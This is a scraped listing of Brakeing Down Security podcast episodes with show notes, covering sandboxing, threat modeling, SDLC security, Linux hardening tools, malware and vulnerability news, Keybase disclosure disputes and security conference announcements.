#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir

#Facebook: https://www.facebook.com/BrakeingDownSec/

#Tumblr: http://brakeingdownsecurity.tumblr.com/

#Player.FM : https://player.fm/series/brakeing-down-security-podcast

#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr

#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582

-----------

Show notes:

Sandboxing tech  -  https://hangouts.google.com/call/yrpzdahvjjdbfhesvjltk4ahgmf

A sandbox is implemented by executing the software in a restricted operating system environment, thus controlling the resources (for example, file descriptors, memory, file system space, etc.) that a process may use.

Various types of sandbox tech

Jails - FreeBSD

    Much like Solaris 10’s zones: a restricted operating-system environment; you can even install another OS, such as Debian, inside a jail

http://devil-detail.blogspot.com/2013/08/debian-linux-freebsd-jail-zfs.html

pledge(2) - new to OpenBSD

    The program declares which classes of system calls it will use; if it steps outside those lines, the kernel kills it

http://www.tedunangst.com/flak/post/going-full-pledge

http://man.openbsd.org/cgi-bin/man.cgi/OpenBSD-current/man2/pledge.2?query=pledge

http://www.openbsd.org/papers/hackfest2015-pledge/mgp00008.html

chroot - OpenBSD, Linux (chroot jails)

    “A chroot on Unix operating systems is an operation that changes the apparent root directory for the current running process and its children”

    Example: “www” runs in /var/www. A chrooted www website must contain all the necessary files and libraries inside of /var/www, because to the application /var/www is ‘/’

Rules-based execution - AppArmor, PolicyKit, SELinux

    Allows users to set what will be run, and which apps can inject DLLs or objects.

    “It also can control file/registry security (what programs can read and write to the file system/registry). In such an environment, viruses and trojans have fewer opportunities of infecting a computer.”

https://en.wikipedia.org/wiki/Seccomp

https://en.wikipedia.org/wiki/Linux_Security_Modules

Android VMs

Virtual machines - sandboxes in their own right

    Snapshot capability

    Revert once changes have occurred

    CON: some malware detects VM environments and changes its behaviour

Containers (docker, kubernetes, vagrant, etc)

    Quick standup of images

    Blow away without loss of host functionality

    Helpful to run containers as an un-privileged user.

https://blog.jessfraz.com/post/getting-towards-real-sandbox-containers/

Chrome sandbox: https://chromium.googlesource.com/chromium/src/+/master/docs/linux_sandboxing.md

Emulation Vs. Virtualization

http://labs.lastline.com/different-sandboxing-techniques-to-detect-advanced-malware  --seems like a good link

VMware Thinapp (emulator):

https://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=1030224


Malware lab creation (Alienvault blog):

https://www.alienvault.com/blogs/security-essentials/building-a-home-lab-to-become-a-malware-hunter-a-beginners-guide

https://www.reverse.it/

News: (assuming it goes short)

SHA-1 generated certs will be deprecated soon - https://threatpost.com/sha-1-end-times-have-arrived/123061/

(whitelisting files in Apache)

https://isc.sans.edu/diary/Whitelisting+File+Extensions+in+Apache/21937

http://blog.erratasec.com/2017/01/the-command-line-for-cybersec.html

https://github.com/robertkuhar/java_coding_guidelines

https://www.us-cert.gov/sites/default/files/publications/South%20Korean%20Malware%20Attack_1.pdf#

https://www.concise-courses.com/security/conferences-of-2017/

Feb 06 2017

52mins

Rank #19: 2016-047: Inserting Security into the SDLC, finding Privilege Escalation in poorly configured Linux systems

Just a quick episode this week...

As part of the Brakesec Book Club (join us on our #Slack Channel for more information!) we are discussing Dr. Gary McGraw's book "Software Security: Building Security In" (Amazon Link: https://is.gd/QtHQcM)

We talk about the need to insert security into your company's #SDLC... but what exactly can be done to enable that? I talk about abuse cases, #risk #analysis, creating test cases, pentesting, and #security #operations, which are all methods to do so.

Finally, I discovered a blog talking about ways to discover configuration errors on Linux systems that might allow #privilege #escalation to occur. Using these tools as part of your hardening processes could lower the risk of a bad actor gaining elevated privileges on your *unix hosts

http://rajhackingarticles.blogspot.com/2016/11/4-ways-to-get-linux-privilege-escalation.html

You can find the github of this script and the audit software that I mentioned below:

https://github.com/rebootuser/LinEnum.git

#Lynis (from CISOfy): https://cisofy.com/lynis/

Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-047-inserting_security_into_the_SDLC_finding_Linux_priv_esc.mp3

#iTunes: https://itunes.apple.com/us/podcast/2016-047-inserting-security/id799131292?i=1000378329598&mt=2

#YouTube: https://www.youtube.com/watch?v=Kd_ZzvVNqoA

#RSS: http://www.brakeingsecurity.com/rss

#Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969

#SoundCloud: https://www.soundcloud.com/bryan-brake

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security #Podcast on #Patreon: https://www.patreon.com/bds_podcast

#Twitter: @brakesec @boettcherpwned @bryanbrake

#Facebook: https://www.facebook.com/BrakeingDownSec/

#Tumblr: http://brakeingdownsecurity.tumblr.com/

#Player.FM: https://player.fm/series/brakeing-down-security-podcast

#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr

#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582

Nov 28 2016

19mins

Rank #20: 2017-036-Adam Shostack talks about threat modeling, and how to do it properly

Direct Link:  http://traffic.libsyn.com/brakeingsecurity/2017-036-Adam_Shostack-threat_modeling.mp3

Adam Shostack has been a fixture of threat modeling for nearly 2 decades. He wrote the 'threat modeling' bible that many people consult when they need to do threat modeling properly.

We discuss the different threat modeling types (STRIDE, DREAD, Trike, PASTA) and which ones Adam enjoys using.

Mr. Boettcher asks how to handle people who believe one OS is better than another, and how to use threat modeling to decide which OS should be the one to use.

Stay after for a special post-show discussion with Adam about his friend Stephen Toulouse (@stepto).

RSS: http://www.brakeingsecurity.com/rss

Youtube Channel:  http://www.youtube.com/c/BDSPodcast

#iTunes Store Link:  https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2

#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast

Join our #Slack Channel! Sign up at https://brakesec.signup.team

#iHeartRadio App:  https://www.iheart.com/show/263-Brakeing-Down-Securi/

#SoundCloud: https://www.soundcloud.com/bryan-brake

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast

#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir

#Player.FM: https://player.fm/series/brakeing-down-security-podcast

#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr

#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/

SHOW NOTES:

Ideas and suggestions here:

Start with “What is threat modeling?”   What is it, why do people do it, why do organizations do it?

What happens when it’s not done effectively, or at all?

At what point in the SDLC should threat modeling be employed?

Planning?

Development?

Can threat models be modified when new features/functionality gets added?

Otherwise, are these just to ‘check a compliance box’?

Data flow diagram (example) -

process flow

External entities

Process

Multiple Processes

Data Store

Data Flow

Privilege Boundary

Classification of threats -

STRIDE - https://en.wikipedia.org/wiki/STRIDE_(security)

DREAD - https://en.wikipedia.org/wiki/DREAD_(risk_assessment_model)

PASTA - https://www.owasp.org/images/a/aa/AppSecEU2012_PASTA.pdf

Trike -  http://octotrike.org/

https://en.wikipedia.org/wiki/Johari_window

Butler Lampson, Steve Lipner link: https://www.nist.gov/sites/default/files/documents/2016/09/16/s.lipner-b.lampson_rfi_response.pdf

Escalation Of Privilege card game: https://www.microsoft.com/en-us/download/details.aspx?id=20303

NIST CyberSecurity Framework: https://www.nist.gov/cyberframework

Data Classification Toolkit - https://msdn.microsoft.com/en-us/library/hh204743.aspx

Microsoft bug bar (security) - https://msdn.microsoft.com/en-us/library/windows/desktop/cc307404.aspx

Microsoft bug bar (privacy) - https://msdn.microsoft.com/en-us/library/windows/desktop/cc307403.aspx

OWASP threat Modeling page: https://www.owasp.org/index.php/Application_Threat_Modeling

OWASP Threat Dragon - https://www.owasp.org/index.php/OWASP_Threat_Dragon

Emergent Design:  https://adam.shostack.org/blog/2017/10/emergent-design-issues/

https://www.researchgate.net/profile/William_Yurcik/publication/228634178_Threat_Modeling_as_a_Basis_for_Security_Requirements/links/02bfe50d2367e32088000000.pdf

Robert Hurlbut (workshop presenter at SourceCon Seattle) https://roberthurlbut.com/Resources/2017/NYMJCSC/Robert-Hurlbut-NYMJCSC-Learning-About-Threat-Modeling-10052017.pdf (much the same content as given at Source)

Adam’s Threat modeling book

http://amzn.to/2z2cNI1 -- sponsored link

https://www.amazon.com/Threat-Modeling-Designing-Adam-Shostack/dp/1118809998/ref=mt_paperback?_encoding=UTF8&me=

Is the book still applicable?

New book

What traps do people fall into?  Attacker-centered, asset-centered approaches

Close with “how do I get started on threat modeling?”

SecShoggoth’s Class “intro to Re”

Johari window? http://www.selfawareness.org.uk/news/understanding-the-johari-window-model

Oct 29 2017

1hr 34mins

2020-001- Android malware, ugly citrix bugs, and Snake ransomware

Educause conference: https://events.educause.edu/security-professionals-conference/2020/hotel-and-travel

Amanda’s Training that everyone should come to!!! https://nolacon.com/training/2020/security-detect-and-defense-ttx

Follow twitter.com/infosecroleplay

 

Part 1: New year, new things

Discussion:

What happened over the holidays? What did you get for christmas?

PMP test is scheduled for 10 March

Proposal:  Anonymous Hacker segment

    Similar to “The Stig” on Top Gear. If you would like to come on and discuss any topic you like, you’ll have anonymity; we won’t share your contact info

  1. Will allow people worried that they’ll be ridiculed to share their knowledge
  2. We can record your 20-30 segment whenever (will need audio/video for it)
  3. You can take a tutorial from another site (or your own) and review it for us
  4. 1-2 segments per month 
  5. We can discuss content prior to (we won’t put you on the spot)
  6. We do have a preliminary

News:

 

Google removed 1.7K+ Joker Malware infected apps from its Play Store                   

Full article: https://securityaffairs.co/wordpress/96295/malware/joker-malware-actiity.html

Excerpt:

Google revealed it successfully removed more than 1,700 apps from the Play Store over the past three years that had been infected with the Joker malware.

Google provided technical details of its activity against the Joker malware (aka Bread) operation during the last few years.

The Joker malware is a malicious code camouflaged as a system app and allows attackers to perform a broad range of malicious operations, including disable the Google Play Protect service, install malicious apps, generate fake reviews, and show ads.

The spyware is able to steal SMS messages, contact lists and device information along with to sign victims up for premium service subscriptions.

In October, Google removed 24 apps from Google Play because they were infected with Joker malware; the 24 malicious apps had a total of 472,000 installs.

“Over the past couple of weeks, we have been observing a new Trojan on GooglePlay. So far, we have detected it in 24 apps with over 472,000+ installs in total.” 

apps typically fall into two categories: SMS fraud (older versions) and toll fraud (newer versions). Both of these types of fraud take advantage of mobile billing techniques involving the user’s carrier.” reads the post published by Google.

The newer versions of the Joker malware were involved in toll fraud that consist of tricking victims into subscribing to or purchasing various types of content via their mobile phone bill.

WAP billing: https://en.wikipedia.org/wiki/WAP_billing

Example: Pokémon Go allows in-app purchases

Over 25,000 Citrix (NetScaler) endpoints vulnerable to CVE-2019-19781

Full Article: https://badpackets.net/over-25000-citrix-netscaler-endpoints-vulnerable-to-cve-2019-19781/

Excerpt:

On Friday, January 10, 2020, our honeypots detected opportunistic mass scanning activity originating from a host in Germany targeting Citrix Application Delivery Controller (ADC) and Citrix Gateway (also known as NetScaler Gateway) servers vulnerable to CVE-2019-19781. This critical vulnerability allows unauthenticated remote attackers to execute commands on the targeted server after chaining an arbitrary file read/write (directory traversal) flaw.

 

What type of organizations are affected by CVE-2019-19781?  (industries with typically poor or outdated security practices… --brbr)

4,576 unique autonomous systems (network providers) were found to have vulnerable Citrix endpoints on their network. We’ve discovered this vulnerability currently affects:

  • Military, federal, state, and city government agencies
  • Public universities and schools
  • Hospitals and healthcare providers
  • Electric utilities and cooperatives
  • Major financial and banking institutions
  • Numerous Fortune 500 companies

 

How is CVE-2019-19781 exploited and what is the risk?

This critical vulnerability is easy for attackers to exploit using publicly available proof-of-concept code. Various methods demonstrating how to exploit CVE-2019-19781 have been posted on GitHub by Project Zero India and TrustedSec. A forensic guide is available detailing how to check Citrix servers for evidence of a compromise.

Further exploitation of this vulnerability could be used to spread ransomware (similar to CVE-2019-11510) and cryptocurrency mining malware on sensitive networks. If multiple servers are compromised by the same threat actor, they could be weaponized for coordinated malicious activity such as DDoS attacks.

SNAKE #Ransomware Targets Entire Corporate Systems?

Full Article: https://www.ehackingnews.com/2020/01/snake-ransomware-targets-entire.html

Excerpt:

The new Snake Ransomware family sets out to target organizations' corporate networks in their entirety. Written in Golang and containing a significant level of obfuscation, the attacks were observed and disclosed by a group of security specialists from the MalwareHunterTeam.

The Ransomware upon successful infection subsequently erases the machine's Shadow Volume Copies before ending different processes related to SCADA frameworks, network management solutions, virtual machines, and various other tools.

After that, it continues to encrypt the machine's files while skirting significant Windows folders and system files. As a feature of this procedure, it affixes "EKANS" as a file marker alongside a five-character string to the file extension of each file it encrypts. The threat wraps up its encryption routine by dropping a ransom note entitled "Fix-Your-Files.txt" in the C:\Users\Public\Desktop folder, which instructs victims to contact "bapcocrypt@ctemplar.com" so as to purchase a decryption tool.


Jan 13 2020

38mins

2019-046-end of the year, end of the decade, predictions, and how we've all changed

End of year, end of decade

    Are things better than 10 years ago? 5 years ago?

    If there was one thing to change things for the better, what would that be?

 

Good, Bad, Ugly 

Did naming vulns make things better?

    Which industries are doing a good job of securing themselves? Finance?

    What do you wish had never happened (security/compliance wise)?

    Ransomware infections with no bounties

    Still have people believing “Nessus” is a pentest

https://nrf.com/

https://www.retailitinsights.com/eventscalendar/eventdetail/1c77d5c6-8625-4f2b-bb98-89cca6590c49

https://monitorama.com/

https://www.apics.org/credentials-education/events

 

The Future

    PREDICTIONS!!!

    Bryan: The rise of the vetting programs  (Companies will want to vet content creators in their eco-systems)

    Cybuck: An uptick in surveillance tech; both disguised as cool home smart gadgets and straight up public safety.  Triggering a US GDPR type response.

Injection remains the undisputed heavyweight champion of app sec vulnerability (OWASP top 10). And wishful thinking... broken authentication moves lower, denial of service goes down. https://twitter.com/WeldPond/status/1207383327491137536/photo/1

JB: a major change in social media/generational shift in how we use it, legal or focus on new types of  mobile tech for example… Human networking in real-life in the age of ‘social’ ….“When you hire someone… you also hire their rolodex”  --- what do you think about this statement?  ..it’s role in InfoSec? Talent?

JB- shouted out https://github.com/redcanaryco/atomic-red-team (Invoke-Atomic framework with powershell now on Linux, OSX, and Windows)

JB - Link to the hunting/stopping-human-trafficking org I mentioned:

Shoutout

 Sherrie Caltagirone, Executive Director, Global Emancipation Network @GblEmancipation

https://www.sans.org/cyber-security-summit/archives/file/summit_archive_1569941622.pdf

Mentioned https://monitorama.com/ and https://github.com/viq/air-monitoring-scripts (viq from Brakesec)

   

Other topics

    Talk about where you were 10 years ago, and what you did to get where you are?

    Best Hacking tool?

    Best Enterprise Tool?

 

Recent news

https://www.zdnet.com/article/more-than-38000-people-will-stand-in-line-this-week-to-get-a-new-password/

https://www.phoronix.com/scan.php?page=news_item&px=CERN-MALT-Microsoft-Alternative

https://www.iotworldtoday.com/2019/12/21/2020-predictions-apis-become-a-focus-of-iot-security/

https://www.jonesday.com/en/insights/2018/10/california-to-regulate-security-of-iot-devices 

News Stories from 2010 (see if they still make sense, or outdated)

https://www.infosecurity-magazine.com/magazine-features/what-makes-a-ciso-employable/

https://www.csoonline.com/article/2231454/verizon-s-2010-dbir--rise-in-misuse--malware-and-social-engineering.html

https://www.owasp.org/index.php/OWASPTop10-2010-PressRelease


Dec 23 2019

1hr 18mins

2019-045-Part 2-Noid, Dave Dittrich, empowered teams, features vs. security

The day after part 1

Keybase halted the spacedrop the day after the first podcast was complete...

Security failures in implementation

    “We need to push this to market, we’ll patch it later!”

Risk management discussion for project managers (PMP)

CIA Triad… where does ‘business goals’ fit? Security is at odds with the bottom line

Reference Noid’s Bsides Seattle talk and podcast earlier this year.

Other companies that have made security mistakes in the name of business

Practical Pentest Labs storing passwords in the clear

https://twitter.com/mortalhys/status/1202867037120475136

https://web.archive.org/web/20191207132548/https://twitter.com/mortalhys/status/1202867037120475136

https://twitter.com/piaviation/status/1202994484172218368

T-Mobile Austria partial password issues:

https://www.pcmag.com/news/360301/t-mobile-austria-admits-to-storing-passwords-partly-in-clear

    No one was championing security, because no one considered the problems with partial disclosure of the passphrase in an account.

    Marketing people on your social media accounts do NOT help allay security issues (because they didn’t have escalation procedures for vuln disclosure)

        Insider threats could take over accounts

Follow-up from last week’s show with Bea Hughes:

I liked the interesting discussion about security and DevOps teams with Bea Hughes in your recent podcast. When you mentioned you are taking your PMP for agile, I'm surprised you did not mention the term "product owner". You were asking who cares about security that you, as a security guy, can talk to. Bea mentioned that it was the "stakeholders", but in the agile process the "product owner" is the team's advocate for the "stakeholders".

And, you also mentioned "PM", as in project manager. In an agile world, the typical PM role is minimized. Actually, ideally the PM is removed entirely in favor of empowered teams. Empowered teams understand that good products are reliable and secure. (Secure because the security CIA includes "availability" and "integrity", aka reliability.)

As Director of DevOps for my 4,000-person-strong consulting company, I'm working with our security team to push responsibility for security to our development teams. Empowering them to take the time and bear the costs of using security tools prior to release and during system operation is what we are working on now, as we roll into 2020.

If the ‘product owner’ or ‘empowered team’ does not consider security a priority/requirement, then who champions security? It only becomes a priority when something bad happens, like a breach.

“Empowered teams”

 Some people aren’t fans:   https://hackernoon.com/the-surprising-misery-of-empowered-teams-35c3679cf11e


Dec 18 2019

1hr 2mins

2019-044-Noid and Dave Dittrich discusses recent keybase woes - Part 1

Patreon donor goodness: Scott S. and Ion S.

@_noid_ @davedittrich

Their response:

 “it’s not a bug, it’s a feature”

    “Don’t write a blog post that will point out the issue”

    “You pointing out our issues makes things more difficult for us”

    “It’s a free service, why are you hurting us?”

https://keybase.io/docs/bug_reporting

Nov 22nd

Noid (@_noid_) Keybase discussion blog post

https://www.whiskey-tango.org/2019/11/keybase-weve-got-privacy-problem.html

Reddit post showing potential SE attacks occurring: https://www.reddit.com/r/Keybase/comments/e6uou3/hi_guys_i_received_a_message_today_that_is/

Keybase’s decision to fix it came out after The Register asked them about the issue…

Dec 4th

https://keybase.io/blog/dealing-with-spam

Dec 5th.

https://www.theregister.co.uk/2019/12/05/keybase_struggles_with_harassment/

Problems with the implementation:  

        Requiring Keybase admins to decide what’s wrong, or whether accounts need to be deleted

        Additional dummy accounts being created on other sites (keybase, twitter, git, reddit, etc), generating problems for those services (as if Twitter doesn’t have enough issues with bots/shitty people)

        Cryptocurrency = trolls/phishing/SE attempts to get folks to hand over their lumens (what’s the motivation of creating the coin?)

        They’ve already opened the spam door, and they’ll not be able to shut it.

Once they took the VC and aligned themselves with Stellar, the attack surface changes

    From Account takeover (integrity attacks) to deception (social engineering)

What is keybase?

    Social network?

    E2E chat

Encrypted file share/storage?

    CryptoCurrency Company? 

    Secure git repo protector?

Which ones do they do well?  

How could they have solved the spam issue?

    Made the cryptocoin a separate application?

        Even their /r/keybase is filling up with spammers asking about their Lumens

How could they fix it?

    You can’t contact someone unless that person allows you to.

    Allow someone to contact you, but do not allow adding to teams without permission

https://news.ycombinator.com/item?id=21719702 (ongoing HN thread)

Noid isn’t the only person with issues in Keybase: https://vicki.substack.com/p/keybase-and-the-chaos-of-crypto

https://it.slashdot.org/story/19/12/06/1610259/keybase-moves-to-stop-onslaught-of-spammers-on-encrypted-message-platform

https://keybase.io/docs-assets/blog/NCC_Group_Keybase_KB2018_Public_Report_2019-02-27_v1.3.pdf

Stephen Carter's definition of “integrity.”

Integrity, as I will use the term, requires three steps: (1) discerning what is right and what is wrong, (2) acting on what you have discerned, even at personal cost; and (3) saying openly that you are acting on your understanding of right from wrong.

 — Stephen Carter, “Integrity.” HarperCollins. https://www.harpercollins.com/9780060928070/integrity/

Can the person [who took the controversial act] explain their reasoning, based on principles they can articulate and would follow even if it meant they paid a price? Or do they selectively choose principles in arbitrary ways so as to fit the current circumstances in order to guarantee they get an outcome that benefits them?

noid’s blog post clearly documents the timeline of interactions with Keybase, including: (1) providing detailed steps to reproduce; (2) suggesting mitigations that could be implemented in the architecture; (3) providing guidance to users to protect themselves when the vulnerability disclosure was made public; and (4) justifying his decision to go public by citing and following a vulnerability disclosure policy of a major industry leader in this area, Google:

Following Google Security’s guidelines for issues being actively exploited in the wild, I chose to release this information 7 days after I last heard from Keybase. The ACM Code of Conduct has several sections that could apply here: 1.1 Contribute to society and to human well-being, acknowledging that all people are stakeholders in computing. 1.2 Avoid harm. 1.6 Respect privacy. 2.1 Strive to achieve high quality in both the processes and products of professional work. 2.7 Foster public awareness and understanding of computing, related technologies, and their consequences. 3.1 Ensure that the public good is the central concern during all professional computing work. 3.7 Recognize and take special care of systems that become integrated into the infrastructure of society.

The right to privacy of your information, as well as the right to choose with whom you associate and communicate, are both arguably duties based on the concept of autonomy (i.e., your right to choose).

In biomedical and behavioral research, the principle involved here is known as Respect for Persons and is best recognized as the idea of informed consent. Giving users autonomy in making their data public, but not giving them autonomy in who they allow to communicate with them and add them to “teams,” could be viewed as conflicting as regards this principle.

This is in fact precisely what noid brought up in his initial communication with Keybase:

I had a random guy I don’t follow add me to a team and start messaging me about cryptocurrency stuff. This really shouldn’t be default behavior. This can result in a spam or harassment vector (hence why I’m reluctant to post it on the open forum). Ideally the default behavior should be that no one can add you to a team without your consent. Then maybe have an option of allowing those you follow to be able to do so, and as a final option let anyone add you to a team (but make sure folks know this isn’t recommended).

Dec 10 2019

1hr 1min

2019-043-Bea Hughes, dealing with realistic threats in your org

Realistic Threats 

Nation states aren’t after you

https://twitter.com/beajammingh/status/1191884466752385025

https://twitter.com/beajammingh/status/1198671660150226946

https://twitter.com/beajammingh/status/1198671952824565762

https://www.leviathansecurity.com/blog/the-calculus-of-threat-modeling

What are credible threats?

Malicious insiders - 

Non-malicious insiders - https://www.scmagazine.com/home/security-news/not-every-insider-threat-is-malicious-but-all-are-dangerous/

    Education issue?

    Is there such a thing as ‘non-malicious’ or is this just bunk?

Real threats

https://resources.infosecinstitute.com/5-new-threats-every-organization-prepared-2018/

CIO magazine threats -- buzzword threats (we should totally containerize all the things)

Vulns that have names (blue team is stuck dealing with ‘theoretical’ issues e.g. SPECTRE/MELTDOWN)

Lack of well-priced training?

    Dev Training?

    Security Training?

Better management communication will reduce threats

    Building trust so they don’t freak when ‘$insert_named_vuln’ shows up

    Gotta frame it to business needs

    “Everyone is vulnerable” - keep FUD to a minimum, don’t exaggerate.

    Know your industry’s threats (phishing, money transfer fraud, malware)

Patreon donor:  Michael K. $10 patron!

Layer8conf - https://www.workshopcon.com/events

https://layer8conference.com/

Regarding diversity scholarships, it's being worked on and the number of available spots will highly depend on the number of Sponsorships the conference secures.

As a side note WorkshopCon will sponsor a number of Layer8 conference tickets if people follow @WorkshopCon on Twitter and tweet to us why they are interested in Social Engineering and OSINT topics with hashtag #sendMeToLayer8. We will select folks from those tweets with the emphasis being on folks coming from underrepresented or minority groups.

In terms of sponsorship information for Layer8, Patrick wants people to send an email to sponsors@layer8conference.com

Please let us know if you have any other questions, and thank you so much for giving us a hand spreading the word!!!

Saturday June 6, 2020, RI Convention Center

https://www.dianainitiative.org/

https://twitter.com/DianaInitiative

Conference in Las Vegas (Aug 6-7, 2020) (Thu & Fri)


Dec 04 2019

1hr 10mins

2019-042-CircuitSwan, Gitlabs, Job descriptions that don't suck, layer8con

Diana Initiative

@circuitswan @dianainitiative

https://www.dianainitiative.org/

https://twitter.com/DianaInitiative

Conference in Las Vegas (Aug 6-7, 2020) (Thu & Fri)

info@dianainitiative.org

Topics  

  1. Diana initiatives
    1. Past
      1. 2015 - idea at defcon 23
      2. 2016-17-18 growing but got too big!
      3. 2019 got our own space, ~800 tickets
      1. 2020 plans-westin again, 2 speaking tracks and 1 workshop track, solder village, career village, CTF, lock picking
      2. Mentoring both CFP and presenters this year! (expansion from last year)
      3. student scholarship (we want to double the amount of money, target still 10)
      4. Free tickets (expansion over last year)
    2. Present
      1. Slogan contest 2020
      2. I don’t want to think about 2021 yet :)
    3. Future
      1. Mentors
      2. Reviewers
      3. Volunteers
      4. Donations (giving tuesday, scholarships)
    4. Needs/wants

  1. Discuss how to add more DNI into your event (conference, meetup, slack, etc)
    1. Women in Technology Diana 2018
    1. https://business.linkedin.com/talent-solutions/blog/job-descriptions/2018/5-must-dos-for-writing-inclusive-job-descriptions
    2. https://www.hudsonrpo.com/rpo-intelligence/recruitment-process-outsourcing/how-to-write-an-inclusive-job-description/
    3. https://www.refinery29.com/en-us/2017/04/148547/how-to-get-a-raise-chatbot-cindy-gallop
  2. Better job descriptions

  • Other topics of interests
  • Career village / resume clinic work in general (spoken on this twice, volunteer at resume clinic)
  • WAN party / Women’s meetup at Defcon with @sylv3on_ @nemessisc and more
  • GitLab security scans (that's me!) 

  1. We are responsible for baking Sec into DevOps and hence write the red team software (well, integrate in most cases) for your appsec team if your devs are using GitLab. We have a security team that secures GitLab itself, but that's not us. We have SAST, DAST, Dependency, Secret Detection and License Compliance baked into our paid tier, and SAST is coming down to the free tier! I’m pitching a talk about tuning to ShmooCon because it seems like that's the most common question I got as a result of my DevSecOps talks at DerbyCon / ShellCon / BSidesDC.
    1. N.Schwartz: Are you ready to leverage DevSecOps? BSidesDC 2019

2019 ShellCon Tuneup Tips for Your CV and Profile, From an Interviewer

SE Village Con - Thu, Feb 20 - Sat, Feb 22 | Hilton Orlando Buena Vista Palace

Layer8conf - https://www.workshopcon.com/events

https://layer8conference.com/

Regarding diversity scholarships, it's being worked on and the number of available spots will highly depend on the number of Sponsorships the conference secures.

As a side note WorkshopCon will sponsor a number of Layer8 conference tickets if people follow @WorkshopCon on Twitter and tweet to us why they are interested in Social Engineering and OSINT topics with hashtag #sendMeToLayer8. We will select folks from those tweets with the emphasis being on folks coming from underrepresented or minority groups.

In terms of sponsorship information for Layer8, Patrick wants people to send an email to sponsors@layer8conference.com

Please let us know if you have any other questions, and thank you so much for giving us a hand spreading the word!!!

Saturday June 6, 2020, RI Convention Center


Nov 27 2019

1hr

2019-041-circuitswan, diana initiative, diversity initiatives at conferences

Diana Initiative

@circuitswan

https://www.dianainitiative.org/

https://twitter.com/DianaInitiative

Conference in Las Vegas (Aug 6-7, 2020) (Thu & Fri)

info@dianainitiative.org

Topics  

  1. Diana initiatives
    1. Past
      1. 2015 - idea at defcon 23
      2. 2016-17-18 growing but got too big!
      3. 2019 got our own space, ~800 tickets
      1. 2020 plans-westin again, 2 speaking tracks and 1 workshop track, solder village, career village, CTF, lock picking
      2. Mentoring both CFP and presenters this year! (expansion from last year)
      3. student scholarship (we want to double the amount of money, target still 10)
      4. Free tickets (expansion over last year)
    2. Present
      1. Slogan contest 2020
      2. I don’t want to think about 2021 yet :)
    3. Future
      1. Mentors
      2. Reviewers
      3. Volunteers
      4. Donations (giving tuesday, scholarships)
    4. Needs/wants

  1. Discuss how to add more DNI into your event (conference, meetup, slack, etc)
    1. Women in Technology Diana 2018
    1. https://business.linkedin.com/talent-solutions/blog/job-descriptions/2018/5-must-dos-for-writing-inclusive-job-descriptions
    2. https://www.hudsonrpo.com/rpo-intelligence/recruitment-process-outsourcing/how-to-write-an-inclusive-job-description/
    3. https://www.refinery29.com/en-us/2017/04/148547/how-to-get-a-raise-chatbot-cindy-gallop
  2. Better job descriptions

  • Other topics of interests
  • Career village / resume clinic work in general (spoken on this twice, volunteer at resume clinic)
  • WAN party / Women’s meetup at Defcon with @sylv3on_ @nemessisc and more
  • GitLab security scans (that's me!) 

  1. We are responsible for baking Sec into DevOps and hence write the red team software (well, integrate in most cases) for your appsec team if your devs are using GitLab. We have a security team that secures GitLab itself, but that's not us. We have SAST, DAST, Dependency, Secret Detection and License Compliance baked into our paid tier, and SAST is coming down to the free tier! I’m pitching a talk about tuning to ShmooCon because it seems like that's the most common question I got as a result of my DevSecOps talks at DerbyCon / ShellCon / BSidesDC.
    1. N.Schwartz: Are you ready to leverage DevSecOps? BSidesDC 2019

2019 ShellCon Tuneup Tips for Your CV and Profile, From an Interviewer

SE Village Con - Thu, Feb 20 - Sat, Feb 22 | Hilton Orlando Buena Vista Palace

Layer8conf - https://www.workshopcon.com/events

https://layer8conference.com/

Regarding diversity scholarships, it's being worked on and the number of available spots will highly depend on the number of Sponsorships the conference secures.

As a side note WorkshopCon will sponsor a number of Layer8 conference tickets if people follow @WorkshopCon on Twitter and tweet to us why they are interested in Social Engineering and OSINT topics with hashtag #sendMeToLayer8. We will select folks from those tweets with the emphasis being on folks coming from underrepresented or minority groups.

In terms of sponsorship information for Layer8, Patrick wants people to send an email to sponsors@layer8conference.com

Please let us know if you have any other questions, and thank you so much for giving us a hand spreading the word!!!

Saturday June 6, 2020, RI Convention Center


Nov 21 2019

38mins

2019-040-vulns in cisco kit, google's project 'nightmare', healthcare data issues, TAGNW conference update

Tagnw.org

Amazon Smile - brakesec.com/smile

News: 

https://www.androidpolice.com/2019/11/11/google-project-nightingale-health-records-collection/

https://www.csoonline.com/article/3439400/secrets-of-latest-smominru-botnet-variant-revealed-in-new-attack.html

https://blog.naijasecforce.com/the-jar-based-malware/ - via InfoSecSherpa’s mailing list, “Nuzzle”

https://www.axios.com/hospitals-cybersecurity-medical-information-hacking-076cb826-fc69-4ba6-b3fd-57ce19ab00c6.html

https://www.axios.com/hospitals-doctors-privacy-records-hacks-data-5cb5d8c1-27de-4cc1-94d8-634015efc04a.html

https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/

       https://en.wikipedia.org/wiki/Data_Protection_API

https://latesthackingnews.com/2019/11/10/multiple-security-issues-detected-in-cisco-small-business-routers-update-now/

https://www.routefifty.com/tech-data/2019/11/plan-engage-hackers-election-security/161045/

https://www.darkreading.com/vulnerabilities---threats/microsoft-security-setting-ironically-increases-risks-for-office-for-mac-users/d/d-id/1336268


Nov 12 2019

1hr 6mins

2019-039-bluekeep_weaponized-npm_security_cracks-grrcon_report

Grrcon update

2019-039-  bluekeep Weaponized… and more

Bluekeep weaponized

https://www.bleepingcomputer.com/news/security/bluekeep-remote-code-execution-bug-in-rdp-exploited-en-masse/

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

https://www.microsoft.com/security/blog/2019/08/08/protect-against-bluekeep/

